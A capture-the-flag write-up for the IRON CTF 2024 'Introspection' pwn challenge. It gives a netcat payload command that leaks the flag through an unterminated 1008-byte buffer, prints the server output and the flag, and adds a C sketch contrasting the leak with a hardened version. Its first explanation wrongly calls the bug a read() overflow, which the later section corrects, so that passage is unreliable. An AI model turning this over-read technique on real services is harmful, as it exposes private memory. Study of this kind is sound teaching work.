# IRON CTF 2024 - Introspection

**Title:** Introspection

**Description:** Know your inner self and get started with Pwn.

`nc pwn.1nf1n1ty.team 31698`

Files:

```bash
Introspection
├── flag.txt
├── introspection
└── introspection.c
```

## Solution:

I started by checking the `introspection.c` file and found out that it has a major security flaw because it uses the `read()` function without checking the limits. The program reads user input into a buffer (`buf`) of 1008 bytes, which can cause a buffer overflow if more data is provided than the buffer can accommodate.

Here are the main parts of the code that show the vulnerability:

1. **Buffer Declaration:**

   ```c
   char buf[1008];
   ```

   The program allocates a fixed-size buffer of 1008 bytes.

2. **Input Handling:**

   ```c
   read(0, buf, 1008);
   ```

   The `read()` function allows the user to input up to 1008 bytes. However, since there is no additional check, an attacker could provide more than 1008 bytes, causing data to overwrite adjacent memory.

3. **Adjacent Memory Access:**

   The buffer overflow can overwrite the memory location where the `flag` variable is stored. The flag is read from `flag.txt`, which means if the input overflows the buffer, it may alter the control flow or reveal sensitive information.

To exploit this vulnerability, I crafted a payload consisting of 1008 'A' characters. By sending this payload to the server, I aimed to overflow `buf` and access the flag.

I executed the following command to generate and send the payload. It uses Python to create a stream of 1008 'A' characters and then sends it to the server:

```bash
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 1008)' | nc pwn.1nf1n1ty.team 31698
```

```bash
$ python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 1008)' | nc pwn.1nf1n1ty.team 31698
"Introspection is the key to unlocking your fullest potential; knowing yourself is the first step." - ChatGPT
Have you thought about what you really wanted in life?
>> I wish for you that you get AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAironCTF{W0w!_Y0u_Just_OverWrite_the_Nul1!} ``` And there's our flag: `ironCTF{W0w!_Y0u_Just_OverWrite_the_Nul1!}`
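
The payload above is exactly 1008 bytes, the most that `read(0, buf, 1008)` will store, and the output shows the flag printed directly after the run of `A`s, which is what a full buffer with no NUL terminator looks like when it is printed as a string. The C sketch below is an added example, not the challenge's source: it models that over-read next to a hardened variant. The adjacent layout, `FLAG_SIZE`, the function names and the sample flag value are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE  1008   /* buffer size given in the write-up */
#define FLAG_SIZE 64     /* assumed size of the flag storage */
#define DEMO_FLAG "FLAG{constructed_placeholder}"   /* constructed sample value */

/* Assumed layout: the flag sits directly after buf. One array models both
 * regions so the over-read stays inside a single object in this demo. */
static char mem[BUF_SIZE + FLAG_SIZE];

static void reset(void) {
    memset(mem, 0, sizeof mem);
    strncpy(mem + BUF_SIZE, DEMO_FLAG, FLAG_SIZE - 1);
}

/* Pattern from the write-up: accept up to BUF_SIZE bytes, as
 * read(0, buf, 1008) does, then print buf as a C string. */
static int echo_unterminated(const char *in, size_t n, char *out, size_t outsz) {
    if (n > BUF_SIZE) n = BUF_SIZE;   /* read() stores at most its count */
    memcpy(mem, in, n);               /* n == BUF_SIZE leaves no NUL in buf */
    return snprintf(out, outsz, "%s", mem);
}

/* Hardened: keep one byte for the terminator and bound the print. */
static int echo_terminated(const char *in, size_t n, char *out, size_t outsz) {
    if (n > BUF_SIZE - 1) n = BUF_SIZE - 1;
    memcpy(mem, in, n);
    mem[n] = '\0';
    return snprintf(out, outsz, "%.*s", BUF_SIZE - 1, mem);
}

/* Returns 1 if echoing n bytes of 'A' exposes the flag in the output. */
int leaks_flag(size_t n, int hardened) {
    char in[BUF_SIZE], out[BUF_SIZE + FLAG_SIZE + 1];
    memset(in, 'A', sizeof in);
    reset();
    if (hardened) echo_terminated(in, n, out, sizeof out);
    else          echo_unterminated(in, n, out, sizeof out);
    return strstr(out, DEMO_FLAG) != NULL;
}

int main(void) {
    printf("1007 bytes, original pattern: leak=%d\n", leaks_flag(1007, 0));
    printf("1008 bytes, original pattern: leak=%d\n", leaks_flag(1008, 0));
    printf("1008 bytes, hardened pattern: leak=%d\n", leaks_flag(1008, 1));
    return 0;
}
```

In this model only an input that fills the buffer completely exposes the adjacent data; one byte fewer leaves a terminator in place and the print stops at the end of the input.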